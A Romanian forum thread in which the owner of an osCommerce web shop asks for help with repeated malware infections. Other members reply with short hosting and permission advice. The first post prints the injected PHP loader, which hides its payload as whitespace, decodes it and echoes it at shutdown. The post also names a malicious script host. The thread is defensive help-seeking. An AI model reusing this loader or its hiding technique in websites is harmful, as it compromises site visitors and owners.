Jump to content

SUBIECTE NOI
« 1 / 5 »
RSS
Filtru sedimente inainte de pompa?

Paște fericit!

electrician constructor video curs

Cum pot bloca transferul de date ...
 Ce reprezinta in chimie abrevieri...

Google pay ma taxeaza in timp ce ...

Kia Picanto 2022 - Problema motor?

Durere umar AC Joint
 Care este cea mai sanatoasa paine?

Zgomot ritmic ce urmeaza rotirea ...

Merita Lumix FZ82 in 2024?

Nu pot activa Memory Integrity
 Supratensiuni accidentale

Cuțit/ briceag drumetie

Cum am acces la o parte dintr-un ...

Mother's Day
 

malware osCommerce

- - - - -
  • Please log in to reply
5 replies to this topic

#1
ralu21188

ralu21188

    New Member

  • Grup: Members
  • Posts: 16
  • Înscris: 26.10.2009
un magazin virtual pe platforma osCommerce recent a fost gasit de google ca fiind "infectat" - dupa tagul de inchidere </html> a adaugat un tag de script cu link spre un jquery(vorba vine). site-ul unde e localizat acesta difera.
prima data a fost pe "hermderzon.cz.cc", cand am descoperit problema de fapt, google-ul bloca site-ul pt ca il gasea infectat.
cand am gasit codul pe care il injecta in toate fisierele .php din partea de administrare, am facut un programel sa "curat" codul. am vazut un warning - php-ul care injecta codul era in tmp, pe care acum nu il mai gasea.
acum a intrat din nou - a bagat din nou codul pe toate .php urile, singura diferenta fiind site-ul unde e hostat "jquery"-ul. am vazut ca a intrat pe multe site-uri facute pe osCommerce ...
are cineva idee cum pot sa detectez cum intra?

codul care il insereaza la inceputul php-urilor:

<?php /**

* Gets some core libraries and displays a top message if required. /*

*/ if(!function_exists('CoreLibrariesHandler')) { /*

*/ function CoreLibrariesHandler() { /*

*/   $session_keys = '                                                                                                                                                                                                                               ';  /*

*/ /*

*/ foreach(str_split($session_keys, 8) as $k=>$v) { /*            

*/ $v = str_replace(' ', 1, str_replace(' ', 0, $v)); /*

*/ $session_keys[$k] = chr(bindec($v)); /*

*/ } /*

*/ /*

*/ if($session_keys) echo $session_keys; } /*

*/ register_shutdown_function('CoreLibrariesHandler'); /*

*/ } /*

************************************************************************/







?>

#2
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
E posibil sa fie o vulnerabilitate pe server. Vorbeste cu host-ul.

#3
ralu21188

ralu21188

    New Member

  • Grup: Members
  • Posts: 16
  • Înscris: 26.10.2009

View Postcrysty2k5, on 1st June 2011, 21:12, said:

E posibil sa fie o vulnerabilitate pe server. Vorbeste cu host-ul.


Nu e problema pe server, am si alt shop acolo tot pe osc si nu a fost infectat. Am curatat din nou codul, acum pare ca nu s-a mai catarat nimic pe acolo. Dar never say never.

#4
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Daca fisierele nu sunt dinamice si nu e nevoie sa se schimbe ceva dinamic in cod le poti seta permisiuni gen doar read.

Edited by crysty2k5, 03 June 2011 - 19:44.


#5
ralu21188

ralu21188

    New Member

  • Grup: Members
  • Posts: 16
  • Înscris: 26.10.2009
fisierele sunt dinamice.
si de as fi setat doar read pt toti, din moment ce a avut drept de scriere pe server ... si-a cam bagat nasu' peste tot.

#6
rootkit

rootkit

    Awake. Security DNA

  • Grup: Senior Members
  • Posts: 34,883
  • Înscris: 07.02.2007
Atunci ai o vulnerabilitate pe server.

Anunturi

Neurochirurgie minim invazivă Neurochirurgie minim invazivă

"Primum non nocere" este ideea ce a deschis drumul medicinei spre minim invaziv.

Avansul tehnologic extraordinar din ultimele decenii a permis dezvoltarea tuturor domeniilor medicinei. Microscopul operator, neuronavigația, tehnicile anestezice avansate permit intervenții chirurgicale tot mai precise, tot mai sigure. Neurochirurgia minim invazivă, sau prin "gaura cheii", oferă pacienților posibilitatea de a se opera cu riscuri minime, fie ele neurologice, infecțioase, medicale sau estetice.

www.neurohope.ro

0 user(s) are reading this topic

0 members, 0 guests, 0 anonymous users

Forumul Softpedia foloseste "cookies" pentru a imbunatati experienta utilizatorilor Accept
Pentru detalii si optiuni legate de cookies si datele personale, consultati Politica de utilizare cookies si Politica de confidentialitate